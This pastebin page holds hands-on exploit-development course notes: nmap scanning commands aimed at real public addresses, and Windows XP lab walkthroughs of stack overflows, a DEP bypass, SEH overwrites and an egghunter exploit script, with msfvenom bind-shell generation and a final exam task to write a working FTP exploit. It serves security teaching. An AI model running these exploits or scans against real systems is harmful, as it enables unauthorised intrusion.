- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443


########################
# Scanning Methodology #
########################
 
- Ping Sweep
What's alive?
------------
sudo nmap -sP 157.166.226.*

 
    -if -SP yields no results try:
sudo nmap -sL 157.166.226.*

    -Look for hostnames:
sudo nmap -sL 157.166.226.* | grep com

 
- Port Scan
What's where?
------------
sudo nmap -sS 162.243.126.247

 
 
- Bannergrab/Version Query
What versions of software are running
-------------------------------------
sudo nmap -sV 162.243.126.247

 
 
- Vulnerability Research
Lookup the banner versions for public exploits
----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/


#####################################
# Quick Stack Based Buffer Overflow #
#####################################
 
- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

https://s3.amazonaws.com/infosecaddictsfiles/nc-password-is-netcat.zip
- The password for the file is 'netcat'
 
- Extract this zip file to your Desktop

Open a command prompt
=====================
 
Browse to the folder C:\Users\Student\Desktop\ExploitLab\1-Software-To-Install and install both Python and Nmap
 
 

 
- Go to folder C:\Users\Student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
 
- Open a new command prompt and type:
ncat localhost 9999
 
- In the new command prompt window where you ran ncat type:
HELP
 
- Go to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
 


cd c:\Python27>
 
c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
 
 
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
 
- Now go to folder C:\Users\Student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
 
- Go back to folder C:\Users\Student\Desktop\ExploitLab\4-AttackScripts and run 1-simplefuzzer.py.
 
- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).




 
- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

cd c:\Python27>

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\2-3000chars.py
 




- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338

cd c:\Python27> 

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\3-3000chars.py





4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

cd c:\Python27> 

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\4-count-chars-to-EIP.py
 

 
5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
 
cd c:\Python27> 

c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\5-2006char-eip-check.py
 


6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

cd c:\Python27>  
 
c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\6-jmp-esp.py
 


7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

cd c:\Python27> 


 
c:\Python27>python.exe c:\Users\Student\Desktop\ExploitLab\4-AttackScripts\7-first-exploit.py





#########
# Day 4 #
#########
Please download this file to your Windows host machine, and extract it to your Desktop.
https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip





###########################
# Lab 1a: Stack Overflows #
###########################
 
    #############################
    # Start WarFTPd             #
    # Start WinDBG              #
    # Press F6                  #
    # Attach to war-ftpd.exe    #
    #############################
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
 
 
python warftpd1.py | nc XPSP3-ED-Target-IP 21
 
    At WINDBG prompt
    “r” to show registers or “alt+4”
 
    dd esp
 
 
python warftpd2.py | nc XPSP3-ED-Target-IP 21
 
 
    At WINDBG prompt
    “r” to show registers or “alt+4”
    dd esp
 
    Eip: 32714131
    esp: affd58     (71413471)
 
    Now we need to SSH into the StrategicSec Ubuntu host
 
    cd /home/strategicsec/toolz/metasploit/tools/exploit
 
    ruby pattern_offset.rb 32714131
    485
   
    ruby pattern_offset.rb 71413471
    493
 
    Distance to EIP is:         485
    Relative position of ESP is:    493
 
    RET – POP EIP
    RET 4 – POP EIP and shift ESP down by 4 bytes
 
    cd /home/strategicsec/toolz/metasploit/
    ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
 
        0x7c9c167d push esp; retn 0x304d
        0x7c9d30d7 jmp esp < - how about we use this one
        0x7c9d30eb jmp esp
        0x7c9d30ff jmp esp
 
 
        warftpd3.py with Notepad++
        Fill in the appropriate values
        Distance to EIP
        Address of JMP ESP
 
 
 
python warftpd3.py | nc XPSP3-ED-Target-IP 21
 
    0:003> dd eip
    0:003> dd esp
 
 
 
 
 
    Mention bad characters
    No debugger
 
 
 
python warftpd4.py | nc XPSP3-ED-Target-IP 21
 
nc XPSP3-ED-Target-IP 4444
 
 
 
-------------------------------------------------------------
 
There are 2 things that can go wrong with shellcode. The first thing is a lack of space, and the second is bad characters.
 
Shellcode test 1: Calculate space for shellcode
Look in the warftpd3.py script for the shellcode variable. Change the length of the shellcode being send to test how much you can send before the CCs truncate.
 
 
 
 
 
Shellcode test 2: Identify bad characters
 
Replace the INT3 (cc) dummy shellcode with this string:
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
 
 
Send this new shellcode string and identify the places where it truncates - these are the bad characters
 
 
 
 
Here is what the string looks like after I manually tested and removed each of the bad characters:
shellcode = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
 
 
 
 
./msfvenom -p windows/shell/bind_tcp -f python -b '\x00\x0a\x0d\x40'
 
 
 
 
 
###########################################
# Lab 1b: Stack Overflows with DEP Bypass #
###########################################
 
Reboot your target host and choose the "2nd" option for DEP.
 
 
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
 
 
 
python warftpd1.py | nc XPSP3-ED-Target-IP 21
 
    At WINDBG prompt
    “r” to show registers or “alt+4”
 
    dd esp
 
 
 
 
python warftpd2.py | nc XPSP3-ED-Target-IP 21
 
 
    At WINDBG prompt
    “r” to show registers or “alt+4”
    dd esp
 
    Eip: 32714131
    esp: affd58     (71413471)
 
    Now we need to SSH into the StrategicSec Ubuntu host
 
    cd /home/strategicsec/toolz/metasploit/tools/exploit
 
    ruby pattern_offset.rb 32714131
    485
   
    ruby pattern_offset.rb 71413471
    493
 
 
 
 
 
 
 
 
cd /home/strategicsec/toolz/metasploit/tools/exploit
 
ruby pattern_offset.rb 32714131
 
cd /home/strategicsec/toolz/metasploit/
 
./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
 
 
 
python warftpd3.py | nc XPSP3-ED-Target-IP 21
 
    0:003> dd eip
    0:003> dd esp
 
INT3s - GOOD!!!!!!!
 
 
 
python warftpd4.py | nc XPSP3-ED-Target-IP 21
 
nc XPSP3-ED-Target-IP 4444
 
 
strategicsec....exploit no workie!!!!
 
 
Why????????? DEP!!!!!!!!!!!!!
 
 
 
 
Let's look through ole32.dll for the following instructions:
 
mov al,0x1
ret 0x4
 
We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
 
 
 
./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
 
[DLLs/xpsp3/ole32.dll]
0x775ee00e b001c204
0x775ee00e      mov al, 1
0x775ee010      ret 4
 
 
Then we need to jump to the LdrpCheckNXCompatibility routine in
ntdll.dll that disables DEP.
 
 
 
Inside of ntdll.dll we need to find the following instructions:
 
CMP AL,1
PUSH 2
POP ESI
JE ntdll.7
 
 
 
./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
 
[DLLs/xpsp3/ntdll.dll]
0x7c91cd24 3c016a025e0f84
0x7c91cd24      cmp al, 1
0x7c91cd26      push 2
0x7c91cd28      pop esi
0x7c91cd29      jz 7
 
 
This set of instructions makes sure that AL is set to 1, 2 is pushed
on the stack then popped into ESI.
 
 
 
 
 
dep = "\x0e\xe0\x5e\x77"+\
"\xff\xff\xff\xff"+\
"\x24\xcd\x91\x7c"+\
"\xff\xff\xff\xff"+\
"A"*0x54
 
 
 
    #############################
    # Start WarFTPd             #
    # Start WinDBG              #
    # Press F6                  #
    # Attach to war-ftpd.exe    #
    # bp 0x775ee00e             #
    # g                         #
    #############################
 
 
 
 
python warftpd5.py | nc XPSP3-ED-Target-IP 21
 
---------------------------------------------------------------------------
We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
 
    mov al,0x1
    ret 0x4
 
 
 
 
0:005> g
Breakpoint 0 hit
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
ole32!CSSMappedStream::IsWriteable:
775ee00e b001            mov     al,1
 
 
0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
ole32!CSSMappedStream::IsWriteable+0x2:
775ee010 c20400          ret     4
 
 
 
 
 
---------------------------------------------------------------------------
Ok, so inside of ntdll.dll we need to find the following instructions:
 
    CMP AL,1
    PUSH 2
    POP ESI
    JE ntdll.7
 
0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
ntdll!LdrpCheckNXCompatibility+0x13:
7c91cd24 3c01            cmp     al,1
 
 
0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpCheckNXCompatibility+0x15:
7c91cd26 6a02            push    2
 
 
0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpCheckNXCompatibility+0x17:
7c91cd28 5e              pop     esi
 
 
0:001> t
eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpCheckNXCompatibility+0x18:
7c91cd29 0f84df290200    je      ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
 
 
---------------------------------------------------------------------------
 
 
 
python warftpd5.py | nc XPSP3-ED-Target-IP 21
 
nc XPSP3-ED-Target-IP 4444
 
 
##########################
# Lab 1c: SEH Overwrites #
##########################
 
    #################################################
    # On our VictimXP Host (XPSP3-ED-Target-IP)     #
    # Start sipXexPhone if it isn’t already running #
    # Start WinDBG                                  #
    # Press “F6” and Attach to sipXexPhone.exe      #
    # Press “F5” to start the debugger              #
    #################################################
 
 
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
 
 
 
python sipex0.py XPSP3-ED-Target-IP
 
    0:003> !exchain
    0:003> dds esp
    0:003> dds
 
python sipex1.py XPSP3-ED-Target-IP
 
    0:003> !exchain
    0:003> g
 
    When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
 
 
python sipex2.py XPSP3-ED-Target-IP
 
    0:003> !exchain
    0:003> g
 
 
    ***ssh into instructor Ubuntu host***
    cd /home/strategicsec/toolz/metasploit/tools/exploit
    ruby pattern_offset.rb 41346941             We should see that SEH is at 252
 
 
 
    !load narly
    !nmod
 
    ***ssh into the Ubuntu host***
    ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
    cd /home/strategicsec/toolz/metasploit/
    ./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
 
 
    #####################################
    # sipex3.py in Notepad++.           #
    # Set cseq = 252                    #
    # Set seh2 address to: 0x10015977   #
    #####################################
 
 
python sipex3.py XPSP3-ED-Target-IP
    0:003> !exchain
 
python sipex4.py XPSP3-ED-Target-IP
 
 
 
nc XPSP3-ED-Target-IP 4444
 
 
 
 
 
Brush up on the basics of Structured Exception Handlers:
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408
 
 
 
 
Here are the slides for the exploit dev basics:
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx
 
 
Here are the exploit dev basic videos:
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv
 
 
 
Recommended videos on Structured Exception Handling:
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408
 
 
########################################
# Lab 2a: Not Enough Space (Egghunter) #
########################################
 
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
 
SWS - SIMPLE WEB SERVER
-----------------------
 
Running SWS on Strategicsec-XP-ED-Target-VM
Start > Programs > Simple Web Server (it's in the middle somewhere)
Red icon in system tray
Double click it
- it will pop up a menu
- select "start"
- dialog box shows starting params - port 82
 
WinDBG
- attach to "server.exe"
 
 
python sws1.py | nc XPSP3-ED-Target-IP 82
 
 
 
python sws2.py | nc XPSP3-ED-Target-IP 82
 
 
SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
cd /home/strategicsec/toolz/metasploit/tools/exploit
ruby pattern_offset.rb 41356841             <------- You should see that EIP is at 225
ruby pattern_offset.rb 68413668             <------- You should see that ESP is at 229
 
 
 
 
 
 
 
 
EGGHUNTER:
----------
 
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
          ^^^^^^^^^^^^^^^^
               ABBA
                                         JMP ESP
                                        /
                                       /
GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
 
 
 
 
-----sws3.py-----
#!/usr/bin/python2
 
import os # for output setting
import sys
import struct # for pack function
 
# turn off output buffer and set binary mode
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
 
 
pad = "A" * 225        # distance to EIP
eip = 0x7e429353       # replace EIP to point to "jmp esp" from user32.dll
 
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
 
shellcode = "\xCC" * 700
 
buf = "GET /"
buf += pad + struct.pack('<I', eip) + egghunter
buf += " HTTP/1.0\r\n"
buf += "User-Agent: ABBAABBA"
buf += shellcode
buf += " HTTP/1.0\r\n"
 
sys.stdout.write(buf)
-----






####################
# Day 5 Final Exam #
####################




Section 1: Secure Coding
------------------------



Section 1a: Secure C/C++
------------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03c-Common-Vulnerabilities-in-C-and-C%2B%2B.ppt
Review slides: 
	4 - 17
	24 - 31

1. The majority of buffer overflows are related to "_____________"
2. Using the >> operator in C++ with native C strings is just as dangerous as "_____________".
3. The "_____________" versions of functions, such as strncpy(), are headed in the right direction. But, there are still plenty of misuse and abuse cases that either lead to buffer overflows
4. The "_____________" function is misleading because it doesn't accept a bound on the total size of the destination buffer, but rather the remaining space available in the destination buffer
5. List 10 "Always Dangerous" functions or "banned API" and each functions corresponding "Safe C and C++ Library"
 




Section 1b: Secure Java
-----------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03j-Common-Vulnerabilities-in-Java.ppt
Review slides: 
	34 - 58
	70 - 85

1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
2. If outputting normal text, use "_____________". Simple and secure.
3. If outputting inside a non-text tag, use "_____________".
4. Stored procedure gives "_____________". Implement with "_____________".
5. For parameters, use a "_____________". Simple and secure. For non-parameters, use "_____________".







Section 1c: Secure .Net
-----------------------
https://s3.amazonaws.com/infosecaddictsfiles/F200.03n-Common-Vulnerabilities-in-dot-Net.ppt
Review slides:
	34 - 47
	49 - 60
	89 - 103

1. In pairs, use "_____________". Takes a tainted string, returns a clean string.
2. List the 7 AntiXss Library Functions and when they should be used.
3. In pairs, write "_____________". Returns a safe value. Throws ValidationException if no safe value is found
4. In pairs, use "_____________" to fix command injection. 
	Takes user data
	Returns legal value or throws ValidationException
5. List the 3 "Harder to Fix" Command Injection items







Section 2: Web Application Security Testing
-------------------------------------------

Perform a web Application Security Assessment against the following URL:
http://zero.webappsecurity.com 

Task 2a: Create a web application security test report similar to the reports found in the link below:
https://s3.amazonaws.com/infosecaddictsfiles/WebAppSampleReports.zip

Task 2b: Create a document to prove that you properly tested the website for the OWASP Top 10 vulnerabilities similar to the report found in the link below:
https://s3.amazonaws.com/infosecaddictsfiles/OWASP-Top-10-Proof_Draft_Update.docx





Section 3: Exploit Development
------------------------------


Task 3a: Analysze and comment exploit code found https://www.exploit-db.com/exploits/23243/ (ensure all components of this exploit code are thoroughly explained)


Task 3b: Create a working exploit for FreeFloat FTP
Use the war-ftp exploit code for reference and the Windows XP virtual machine as the target system. 
Download and install FreeFloat FTP Server to the target Windows XP virtual machine and create a working exploit.


Vulnerable FreeFloat FTP Server Download link: 
https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip

FreeFloat FTP Server reference code:
https://www.exploit-db.com/exploits/23243/

Public Pastes

result-3
Bash | 48 sec ago | 4.99 KB
result-2
Bash | 1 min ago | 1.84 KB
result-1
Bash | 1 min ago | 4.37 KB
⭐ FREE giftcards method ON
JavaScript | 2 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 3 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 11 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 12 min ago | 0.17 KB
⭐ get any gift card for AF
JavaScript | 19 min ago | 0.17 KB